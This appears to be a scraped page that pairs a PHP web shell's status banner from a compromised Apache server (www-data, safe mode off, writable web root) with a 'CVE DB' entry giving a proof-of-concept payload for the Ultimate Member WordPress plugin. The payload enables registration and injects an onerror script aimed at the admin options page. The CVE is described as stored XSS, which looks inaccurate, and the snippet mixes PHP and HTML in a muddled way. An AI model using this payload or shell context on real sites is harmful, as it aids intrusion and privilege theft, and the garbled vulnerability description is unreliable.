Software: Apache/2.4.68 (Debian). PHP/8.2.33 uname -a: Linux 9d2024043b5d 7.0.12+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 7.0.12-2kali1 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /var/www/html/ drwxrwxrwx | |
|
[← Back to CVE DB] DescriptionStored Cross-Site Scripting in the Ultimate Member plugin. An attacker able to register/uploads a member can inject script that runs for admins, enabling privilege escalation to administrator. PoC / Payload — CVE-2023-3460 update_option('users_can_register', 1);\n# register user with crafted member field:\n<img src=x onerror="fetch('/wp-admin/options-general.php')"> |